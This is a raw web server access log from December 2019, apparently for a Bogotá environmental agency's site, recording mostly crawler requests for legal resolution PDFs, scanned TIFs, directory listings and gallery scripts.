66.249.64.59 - - [08/Dec/2019:04:14:10 -0500] "GET /BLA/resoluciones/AUTOS%202011/0290.pdf HTTP/1.1" 200 179915
46.229.168.152 - - [08/Dec/2019:04:14:23 -0500] "GET /Anexos%20estudio%20Organizacional%20SDA/index.php?dir=ANEXO%2BNo.%2B7%2B-%2BPROYECTO%2BDE%2BDECRETO%2BMODIFICATORIO%2BDE%2BESTRUCTURA%2BDE%2BLA%2BSDA%2F&order=asc&sort=name HTTP/1.1" 200 6226
207.46.13.228 - - [08/Dec/2019:04:14:33 -0500] "GET /robots.txt HTTP/1.1" 404 1043
207.46.13.228 - - [08/Dec/2019:04:14:34 -0500] "GET /robots.txt HTTP/1.1" 404 1043
216.244.66.195 - - [08/Dec/2019:04:14:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0308.pdf HTTP/1.1" 200 409256
66.249.64.63 - - [08/Dec/2019:04:14:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2649.pdf HTTP/1.1" 200 517460
54.36.149.101 - - [08/Dec/2019:04:15:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201101-1150/00001108.tif HTTP/1.1" 200 142226
66.249.64.61 - - [08/Dec/2019:04:15:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/5513.pdf HTTP/1.1" 200 306774
54.36.149.61 - - [08/Dec/2019:04:15:34 -0500] "GET /robots.txt HTTP/1.1" 404 1015
54.36.150.22 - - [08/Dec/2019:04:15:34 -0500] "GET /images/INTERNET.jpg HTTP/1.1" 200 34880
69.162.124.232 - - [08/Dec/2019:04:15:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.61 - - [08/Dec/2019:04:16:05 -0500] "GET /galeria/nivo-slider/demo/images/banneragendamiento.jpg HTTP/1.1" 304 -
66.249.64.59 - - [08/Dec/2019:04:16:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0777.pdf HTTP/1.1" 200 508503
201.245.192.253 - - [08/Dec/2019:04:16:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29324
201.245.192.253 - - [08/Dec/2019:04:16:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29348
66.249.64.63 - - [08/Dec/2019:04:16:55 -0500] "GET /BLA/resoluciones/AUTOS%202009/0041.pdf HTTP/1.1" 200 104376
192.168.175.104 - - [08/Dec/2019:04:17:03 -0500] "GET / HTTP/1.1" 200 9990
216.244.66.195 - - [08/Dec/2019:04:17:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0467.pdf HTTP/1.1" 200 340868
201.245.192.253 - - [08/Dec/2019:04:16:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29348
157.55.39.77 - - [08/Dec/2019:04:17:10 -0500] "GET /POT-2013/Cartografia/14_Sistema%20de%20Movilidad_Subsistema%20Vial_FEB.pdf HTTP/1.1" 200 4617200
66.249.64.63 - - [08/Dec/2019:04:17:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/1329.pdf HTTP/1.1" 200 7329827
216.244.66.195 - - [08/Dec/2019:04:17:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0641.pdf HTTP/1.1" 200 510761
216.244.66.195 - - [08/Dec/2019:04:18:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1666.pdf HTTP/1.1" 200 329050
66.249.64.61 - - [08/Dec/2019:04:18:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9479.pdf HTTP/1.1" 200 501686
192.168.175.104 - - [08/Dec/2019:04:18:37 -0500] "GET / HTTP/1.0" 200 9990
66.249.64.33 - - [08/Dec/2019:04:19:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/1299.pdf HTTP/1.1" 200 561887
216.244.66.195 - - [08/Dec/2019:04:19:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1887.pdf HTTP/1.1" 200 400746
66.249.64.61 - - [08/Dec/2019:04:19:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20601%20AL%20700/RESOLUCION%200641%20DE%202007.pdf HTTP/1.1" 200 437655
66.249.64.59 - - [08/Dec/2019:04:20:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2683.pdf HTTP/1.1" 200 700214
66.249.64.59 - - [08/Dec/2019:04:20:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/1345.pdf HTTP/1.1" 200 3244269
69.162.124.232 - - [08/Dec/2019:04:20:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.59 - - [08/Dec/2019:04:21:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/5631.pdf HTTP/1.1" 200 461652
66.249.64.61 - - [08/Dec/2019:04:21:56 -0500] "GET /BLA/resoluciones/AUTOS%202007/3046.pdf HTTP/1.1" 200 206589
192.168.175.104 - - [08/Dec/2019:04:22:01 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.61 - - [08/Dec/2019:04:22:39 -0500] "GET /BLA/resoluciones/AUTOS%202018/1757.pdf HTTP/1.1" 200 307957
66.249.64.59 - - [08/Dec/2019:04:23:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/2908.pdf HTTP/1.1" 200 297153
192.168.175.104 - - [08/Dec/2019:04:23:35 -0500] "GET / HTTP/1.0" 200 9990
45.4.57.244 - - [08/Dec/2019:04:23:45 -0500] "GET / HTTP/1.1" 200 9990
157.55.39.68 - - [08/Dec/2019:04:23:50 -0500] "GET / HTTP/1.1" 200 9990
157.55.39.68 - - [08/Dec/2019:04:23:50 -0500] "GET /transparencia/directorioservidores/2016/febrero2016.xlsx HTTP/1.1" 304 -
66.249.64.59 - - [08/Dec/2019:04:24:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6566.pdf HTTP/1.1" 200 322913
66.249.64.59 - - [08/Dec/2019:04:24:11 -0500] "GET /BLA/resoluciones/AUTOS%202013/0951.pdf HTTP/1.1" 200 1389484
66.249.64.59 - - [08/Dec/2019:04:24:48 -0500] "GET /BLA/resoluciones/Notificaciones/REGISTROS%202015/1145.doc HTTP/1.1" 200 203264
186.28.2.55 - - [08/Dec/2019:04:25:21 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
186.28.2.55 - - [08/Dec/2019:04:25:22 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.28.2.55 - - [08/Dec/2019:04:25:23 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
66.249.64.61 - - [08/Dec/2019:04:25:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0307.pdf HTTP/1.1" 200 145319
69.162.124.232 - - [08/Dec/2019:04:25:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.61 - - [08/Dec/2019:04:26:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4121.pdf HTTP/1.1" 304 -
186.28.2.55 - - [08/Dec/2019:04:26:21 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 304 -
186.28.2.55 - - [08/Dec/2019:04:26:24 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 304 -
186.28.2.55 - - [08/Dec/2019:04:26:24 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 304 -
66.249.64.61 - - [08/Dec/2019:04:26:38 -0500] "GET /Publicaciones/2019EE08380.pdf HTTP/1.1" 404 227
201.245.192.253 - - [08/Dec/2019:04:26:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29324
46.229.168.152 - - [08/Dec/2019:04:26:56 -0500] "GET /robots.txt HTTP/1.1" 404 1019
46.229.168.130 - - [08/Dec/2019:04:26:56 -0500] "GET /Anexos%20estudio%20Organizacional%20SDA/index.php?dir=ANEXO%2BNo.%2B3-%2BCONTRATACI%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%93N%2B%2BOPS%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%B4s%2B2008-2012%2F&order=asc&sort=size HTTP/1.1" 200 6325
66.249.64.59 - - [08/Dec/2019:04:26:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/0932.pdf HTTP/1.1" 304 -
192.168.175.104 - - [08/Dec/2019:04:26:59 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.63 - - [08/Dec/2019:04:27:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2840.pdf HTTP/1.1" 200 657380
192.168.175.104 - - [08/Dec/2019:04:28:34 -0500] "GET / HTTP/1.0" 200 9990
66.249.64.61 - - [08/Dec/2019:04:29:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%203201%20AL%203300/RESOLUCION%203257%20DE%202007.pdf HTTP/1.1" 200 2739877
66.249.64.59 - - [08/Dec/2019:04:30:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/0498.pdf HTTP/1.1" 200 1288171
69.162.124.232 - - [08/Dec/2019:04:30:43 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.104 - - [08/Dec/2019:04:31:58 -0500] "GET / HTTP/1.1" 200 9990
46.229.168.138 - - [08/Dec/2019:04:31:59 -0500] "GET /Autoliquidacion/index.php?dir=TR%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%81MITES%2BAGUAS%2BSUPERFICIALES%2F&order=desc&sort=date HTTP/1.1" 200 8148
113.138.132.104 - - [08/Dec/2019:04:32:07 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/RESOLUCIONES%2B2012/&sort=date&order=desc HTTP/1.1" 200 12134
66.249.64.59 - - [08/Dec/2019:04:32:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1411.pdf HTTP/1.1" 200 210859
216.244.66.195 - - [08/Dec/2019:04:33:05 -0500] "GET /BLA/resoluciones/AUTOS%202016/1575.pdf HTTP/1.1" 200 337167
189.183.137.207 - - [08/Dec/2019:04:33:06 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
189.183.137.207 - - [08/Dec/2019:04:33:06 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
189.183.137.207 - - [08/Dec/2019:04:33:06 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
216.244.66.195 - - [08/Dec/2019:04:33:10 -0500] "GET /BLA/resoluciones/AUTOS%202016/1717.pdf HTTP/1.1" 200 470318
157.55.39.68 - - [08/Dec/2019:04:33:01 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2014%20del%2011%20de%20Septiembre%20de%202012.pdf HTTP/1.1" 200 3427471
216.244.66.195 - - [08/Dec/2019:04:33:15 -0500] "GET /BLA/resoluciones/AUTOS%202016/1734.pdf HTTP/1.1" 200 640696
66.249.64.59 - - [08/Dec/2019:04:33:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/1140.pdf HTTP/1.1" 304 -
54.36.150.54 - - [08/Dec/2019:04:33:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20251-300/00000265.tif HTTP/1.1" 200 66446
192.168.175.104 - - [08/Dec/2019:04:33:31 -0500] "GET / HTTP/1.0" 200 9990
54.36.148.98 - - [08/Dec/2019:04:33:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%202001-2050/00002044.tif HTTP/1.1" 200 151208
54.36.148.225 - - [08/Dec/2019:04:33:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%20701-750/00000738.tif HTTP/1.1" 200 99196
216.244.66.195 - - [08/Dec/2019:04:34:05 -0500] "GET /BLA/resoluciones/AUTOS%202016/1738.pdf HTTP/1.1" 200 484071
66.249.64.63 - - [08/Dec/2019:04:34:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/0253.pdf HTTP/1.1" 200 3353113
157.55.39.68 - - [08/Dec/2019:04:34:24 -0500] "GET /transparencia/directorioservidores/2016/febrero2016.xlsx HTTP/1.1" 200 37637
207.46.13.174 - - [08/Dec/2019:04:34:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5906.pdf HTTP/1.1" 200 277536
66.249.64.63 - - [08/Dec/2019:04:34:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/1427.pdf HTTP/1.1" 304 -
69.162.124.232 - - [08/Dec/2019:04:35:43 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.210 - - [08/Dec/2019:04:35:44 -0500] "GET /autoliquidacion HTTP/1.1" 301 310
46.229.168.131 - - [08/Dec/2019:04:35:45 -0500] "GET /Autoliquidacion/index.php?dir=TR%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%81MITES%2BACEITES-RESIDUOS-ESTACIONES%2F&order=asc&sort=date HTTP/1.1" 200 7021
207.46.13.210 - - [08/Dec/2019:04:35:47 -0500] "GET /autoliquidacion/ HTTP/1.1" 200 6377
216.244.66.195 - - [08/Dec/2019:04:36:23 -0500] "GET /BLA/resoluciones/AUTOS%202016/1740.pdf HTTP/1.1" 200 301303
201.245.192.253 - - [08/Dec/2019:04:36:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29324
192.168.175.104 - - [08/Dec/2019:04:36:56 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.59 - - [08/Dec/2019:04:36:58 -0500] "GET /BLA/resoluciones/AUTOS%202014/7168.pdf HTTP/1.1" 200 771801
66.249.64.59 - - [08/Dec/2019:04:38:24 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-63.pdf HTTP/1.1" 200 553263
216.244.66.195 - - [08/Dec/2019:04:38:26 -0500] "GET /BLA/resoluciones/AUTOS%202016/1850.pdf HTTP/1.1" 200 470162
192.168.175.104 - - [08/Dec/2019:04:38:29 -0500] "GET / HTTP/1.0" 200 9990
66.249.64.59 - - [08/Dec/2019:04:39:07 -0500] "GET /BLA/resoluciones/Acuerdos/Acuerdo%20No.%20735%20del%2009%20de%20enero%20de%202019.pdf HTTP/1.1" 200 8685487
216.244.66.195 - - [08/Dec/2019:04:39:16 -0500] "GET /BLA/resoluciones/AUTOS%202016/2091.pdf HTTP/1.1" 200 1244896
186.170.226.70 - - [08/Dec/2019:04:39:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1617.pdf HTTP/1.1" 200 2202343
186.170.226.70 - - [08/Dec/2019:04:39:25 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
46.229.168.129 - - [08/Dec/2019:04:40:27 -0500] "GET /Autoliquidacion/index.php?dir=TR%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%81MITES%2BMINER%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%8DA%2F&order=asc&sort=date HTTP/1.1" 200 7342
66.249.64.63 - - [08/Dec/2019:04:40:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%201501%20AL%201600/RESOLUCION%201574%20DE%202007.pdf HTTP/1.1" 304 -
69.162.124.232 - - [08/Dec/2019:04:40:43 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.86 - - [08/Dec/2019:04:39:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 68272
40.77.188.248 - - [08/Dec/2019:04:40:56 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
40.77.188.211 - - [08/Dec/2019:04:40:57 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
54.36.150.57 - - [08/Dec/2019:04:40:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%20801-850/00000809.tif HTTP/1.1" 200 128332
40.77.189.104 - - [08/Dec/2019:04:40:58 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
40.77.190.29 - - [08/Dec/2019:04:40:59 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
40.77.188.62 - - [08/Dec/2019:04:41:00 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
216.244.66.195 - - [08/Dec/2019:04:41:37 -0500] "GET /BLA/resoluciones/AUTOS%202016/2276.pdf HTTP/1.1" 200 567024
192.168.175.104 - - [08/Dec/2019:04:41:53 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.63 - - [08/Dec/2019:04:41:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/1747.pdf HTTP/1.1" 200 513472
216.244.66.197 - - [08/Dec/2019:04:42:44 -0500] "GET /Anexos%20estudio%20Organizacional%20SDA/index.php?dir=ANEXO+No.+1-+NORMAS+LEGALES+DE+ESTRUCTURA+Y+PLANTA%2FRESE%D1A+HIST%D3RICA+SDA-NORMAS%2FLey+99+de+1993+-+Crea+MimAmbiente_files%2F HTTP/1.1" 200 10385
192.168.175.104 - - [08/Dec/2019:04:43:27 -0500] "GET / HTTP/1.0" 200 9990
216.244.66.195 - - [08/Dec/2019:04:43:57 -0500] "GET /BLA/resoluciones/AUTOS%202016/2941.pdf HTTP/1.1" 200 649156
66.249.88.25 - - [08/Dec/2019:04:44:03 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
54.36.150.121 - - [08/Dec/2019:04:45:20 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2006%2FRES+2006+1751-1800%2F HTTP/1.1" 200 12368
66.249.64.61 - - [08/Dec/2019:04:45:27 -0500] "GET /BLA/resoluciones/AUTOS%202011/6879.pdf HTTP/1.1" 200 2190671
66.249.64.61 - - [08/Dec/2019:04:45:33 -0500] "GET /BLA/resoluciones/AUTOS%202014/6088.pdf HTTP/1.1" 200 474370
69.162.124.232 - - [08/Dec/2019:04:45:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.59 - - [08/Dec/2019:04:46:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/0649.pdf HTTP/1.1" 304 -
216.244.66.195 - - [08/Dec/2019:04:46:17 -0500] "GET /BLA/resoluciones/AUTOS%202016/2964.pdf HTTP/1.1" 200 421588
192.168.175.104 - - [08/Dec/2019:04:46:51 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.59 - - [08/Dec/2019:04:46:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3228.pdf HTTP/1.1" 200 262694
186.113.10.19 - - [08/Dec/2019:04:46:59 -0500] "GET /galeria/nivo-slider/demo/images/bannercapaclimasostenible.jpg HTTP/1.1" 304 -
195.154.122.3 - - [08/Dec/2019:04:47:06 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
195.154.122.3 - - [08/Dec/2019:04:47:06 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
195.154.122.3 - - [08/Dec/2019:04:47:06 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
195.154.122.3 - - [08/Dec/2019:04:47:06 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
195.154.122.3 - - [08/Dec/2019:04:47:06 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
195.154.122.3 - - [08/Dec/2019:04:47:07 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
195.154.122.3 - - [08/Dec/2019:04:47:07 -0500] "GET /galeria/nivo-slider/demo/inicio.html HTTP/1.1" 200 4350
195.154.122.3 - - [08/Dec/2019:04:47:07 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
195.154.122.3 - - [08/Dec/2019:04:47:07 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
195.154.122.3 - - [08/Dec/2019:04:47:07 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
195.154.122.3 - - [08/Dec/2019:04:47:07 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
195.154.122.3 - - [08/Dec/2019:04:47:08 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
195.154.122.3 - - [08/Dec/2019:04:47:08 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
195.154.122.3 - - [08/Dec/2019:04:47:08 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
66.249.64.63 - - [08/Dec/2019:04:47:42 -0500] "GET /BLA/resoluciones/AUTOS%202018/3024.pdf HTTP/1.1" 200 333102
192.168.175.104 - - [08/Dec/2019:04:48:24 -0500] "GET / HTTP/1.0" 200 9990
216.244.66.195 - - [08/Dec/2019:04:48:37 -0500] "GET /BLA/resoluciones/AUTOS%202016/3042.pdf HTTP/1.1" 200 555368
159.138.128.10 - - [08/Dec/2019:04:49:00 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.59 - - [08/Dec/2019:04:49:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/0824.pdf HTTP/1.1" 200 831180
54.36.150.105 - - [08/Dec/2019:04:49:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%202951-3000/00002984.tif HTTP/1.1" 200 313564
66.249.64.63 - - [08/Dec/2019:04:49:51 -0500] "GET /BLA/resoluciones/AUTOS%202015/0052.pdf HTTP/1.1" 200 574204
66.249.88.23 - - [08/Dec/2019:04:49:55 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.88.23 - - [08/Dec/2019:04:49:55 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
66.249.88.19 - - [08/Dec/2019:04:49:55 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
178.128.203.152 - - [08/Dec/2019:04:50:30 -0500] "GET /api/v1/pods HTTP/1.1" 404 1018
66.249.64.61 - - [08/Dec/2019:04:50:34 -0500] "GET /BLA/resoluciones/AUTOS%202016/2990.pdf HTTP/1.1" 200 442064
69.162.124.232 - - [08/Dec/2019:04:50:43 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [08/Dec/2019:04:50:58 -0500] "GET /BLA/resoluciones/AUTOS%202016/3218.pdf HTTP/1.1" 200 652980
54.36.149.82 - - [08/Dec/2019:04:51:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/ANEXOS%20RES%202048/00000004.tif HTTP/1.1" 200 1821156
66.249.64.61 - - [08/Dec/2019:04:51:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/1580.pdf HTTP/1.1" 200 970339
66.249.64.59 - - [08/Dec/2019:04:51:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1726.pdf HTTP/1.1" 200 123104
192.168.175.104 - - [08/Dec/2019:04:51:48 -0500] "GET / HTTP/1.1" 200 9990
54.36.150.157 - - [08/Dec/2019:04:51:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201751-1800/20021773.tif HTTP/1.1" 200 81510
66.249.64.59 - - [08/Dec/2019:04:52:00 -0500] "GET /BLA/resoluciones/AUTOS%202016/1948.pdf HTTP/1.1" 200 352381
34.253.78.120 - - [08/Dec/2019:04:52:13 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
34.253.78.120 - - [08/Dec/2019:04:52:13 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
34.253.78.120 - - [08/Dec/2019:04:52:13 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
34.253.78.120 - - [08/Dec/2019:04:52:13 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
34.253.78.120 - - [08/Dec/2019:04:52:14 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
34.253.78.120 - - [08/Dec/2019:04:52:14 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
34.253.78.120 - - [08/Dec/2019:04:52:15 -0500] "GET /galeria/nivo-slider/demo/inicio.html HTTP/1.1" 200 4350
34.253.78.120 - - [08/Dec/2019:04:52:16 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
34.253.78.120 - - [08/Dec/2019:04:52:16 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
34.253.78.120 - - [08/Dec/2019:04:52:16 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
